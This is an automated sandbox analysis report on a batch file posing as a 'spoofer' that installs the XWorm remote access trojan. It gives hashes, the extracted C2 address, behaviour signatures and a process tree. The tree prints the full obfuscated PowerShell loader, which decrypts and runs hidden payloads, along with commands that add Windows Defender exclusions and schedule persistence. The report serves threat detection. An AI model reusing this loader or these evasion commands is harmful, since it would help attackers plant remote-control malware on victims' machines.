Analysis

  • max time kernel
    179s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24-01-2025 14:38

General

  • Target

    EzzSpoofer.bat

  • Size

    291KB

  • MD5

    93ed121ccdb1d03be4f5fa2013de563d

  • SHA1

    d727b44d67723f8d2ee886b727d1b49c0b61d88c

  • SHA256

    fb3ede897d32b7d8a9b16fa2fb1ee1648fceb49bc253f65984708c58f6454bcd

  • SHA512

    0efa1904eef1a0b9ac925b9ef5b5255d37aff31b7f047f038ec780069b5042e1cf17f5fbb3ada53cee2e056eeb085932292d4859bc02b5f89a32b810e200373a

  • SSDEEP

    6144:4yWQ3Hb62YBTYYzGeYSXl7TuvwX/oSmp1FBNh:4o6zTN6efzYFTh

Malware Config

Extracted

Family

xworm

C2

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Attributes
  • Install_directory

    %ProgramData%

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell with the display window hidden.

  • Disables Task Manager via registry modification
  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EzzSpoofer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HRQ080yVZGdRTztrvWAk69rjJhJ8kv24JyK45A33s78='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('n3lZXCHFrDZlOdX5Klqj/Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dkXat=New-Object System.IO.MemoryStream(,$param_var); $gioHA=New-Object System.IO.MemoryStream; $wjXbY=New-Object System.IO.Compression.GZipStream($dkXat, [IO.Compression.CompressionMode]::Decompress); $wjXbY.CopyTo($gioHA); $wjXbY.Dispose(); $dkXat.Dispose(); $gioHA.Dispose(); $gioHA.ToArray();}function execute_function($param_var,$param2_var){ $YESOI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $nNHFI=$YESOI.EntryPoint; $nNHFI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EzzSpoofer.bat';$pOAZp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EzzSpoofer.bat').Split([Environment]::NewLine);foreach ($bDcuD in $pOAZp) { if ($bDcuD.StartsWith(':: ')) { $DRffE=$bDcuD.Substring(3); break; }}$payloads_var=[string[]]$DRffE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Adds Run key to start application
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1040
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3856
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3028
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\ProgramData\powershell.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2576
      • C:\Windows\SYSTEM32\shutdown.exe
        shutdown.exe /f /s /t 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1112
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1032
  • C:\ProgramData\powershell.exe
    C:\ProgramData\powershell.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1320
  • C:\ProgramData\powershell.exe
    C:\ProgramData\powershell.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:1516
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:2712
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa388c855 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:5060

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\ProgramData\powershell.exe

      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Filesize

      53KB

      MD5

      a26df49623eff12a70a93f649776dab7

      SHA1

      efb53bd0df3ac34bd119adf8788127ad57e53803

      SHA256

      4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

      SHA512

      e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      2KB

      MD5

      6e6d88960a2258f4590e97c382884634

      SHA1

      244736513d2d071227c3df04532e67c818e7c9cd

      SHA256

      84cc5d85e71eed874541bd9724ebec8827a12b730b72bd8040fec29ab8a37a50

      SHA512

      d2d5d9aa3fb3b9ac0984f2d06da26c857f6d5479a41caa6b54e04e59b9682283219223a7b217cb9e719bad57381030aa87a9b92a6ed15d865f6d6b1eb96bce2b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      bd5940f08d0be56e65e5f2aaf47c538e

      SHA1

      d7e31b87866e5e383ab5499da64aba50f03e8443

      SHA256

      2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

      SHA512

      c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      dbb22d95851b93abf2afe8fb96a8e544

      SHA1

      920ec5fdb323537bcf78f7e29a4fc274e657f7a4

      SHA256

      e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465

      SHA512

      16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jaj1mq52.sew.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk

      Filesize

      687B

      MD5

      e1ba2cd776750940a82e3d9c48199103

      SHA1

      f398310c74e105a82a3fc564ff9afa05a4ec0b3b

      SHA256

      1901d44f0b89dd4145b363784528518a41e36db5a92ee7527c16f94c5540a6dc

      SHA512

      3d42a8dfddc09dad7dd7a6cda3199a684d21b2932885acc6823b197e0f9ea2ce046f0b1750d53d2f54c50c7056bb75647e17085e6e352482515ee083f53c50c6

    • memory/1032-80-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

    • memory/1032-81-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

    • memory/1032-82-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

    • memory/1032-76-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

    • memory/1032-79-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

    • memory/1032-78-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

    • memory/1032-70-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

    • memory/1032-77-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

    • memory/1032-71-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

    • memory/1032-69-0x00000156AF130000-0x00000156AF131000-memory.dmp

      Filesize

      4KB

    • memory/1040-66-0x0000024650340000-0x000002465034C000-memory.dmp

      Filesize

      48KB

    • memory/1040-43-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

    • memory/1040-0-0x00007FFA135D3000-0x00007FFA135D5000-memory.dmp

      Filesize

      8KB

    • memory/1040-67-0x000002466C370000-0x000002466C898000-memory.dmp

      Filesize

      5.2MB

    • memory/1040-68-0x000002466B030000-0x000002466B03A000-memory.dmp

      Filesize

      40KB

    • memory/1040-60-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

    • memory/1040-57-0x00007FFA135D3000-0x00007FFA135D5000-memory.dmp

      Filesize

      8KB

    • memory/1040-65-0x000002466AF10000-0x000002466AF1C000-memory.dmp

      Filesize

      48KB

    • memory/1040-113-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

    • memory/1040-7-0x00000246503D0000-0x00000246503F2000-memory.dmp

      Filesize

      136KB

    • memory/1040-11-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

    • memory/1040-99-0x000002466B040000-0x000002466B04C000-memory.dmp

      Filesize

      48KB

    • memory/1040-15-0x000002466A980000-0x000002466A998000-memory.dmp

      Filesize

      96KB

    • memory/1040-14-0x000002466A920000-0x000002466A958000-memory.dmp

      Filesize

      224KB

    • memory/1040-13-0x0000024650350000-0x0000024650358000-memory.dmp

      Filesize

      32KB

    • memory/1040-12-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

    • memory/1320-95-0x000001FFF5A00000-0x000001FFF5A44000-memory.dmp

      Filesize

      272KB

    • memory/1320-96-0x000001FFF5CF0000-0x000001FFF5D66000-memory.dmp

      Filesize

      472KB

    • memory/2784-25-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

    • memory/2784-26-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

    • memory/2784-27-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB

    • memory/2784-30-0x00007FFA135D0000-0x00007FFA14091000-memory.dmp

      Filesize

      10.8MB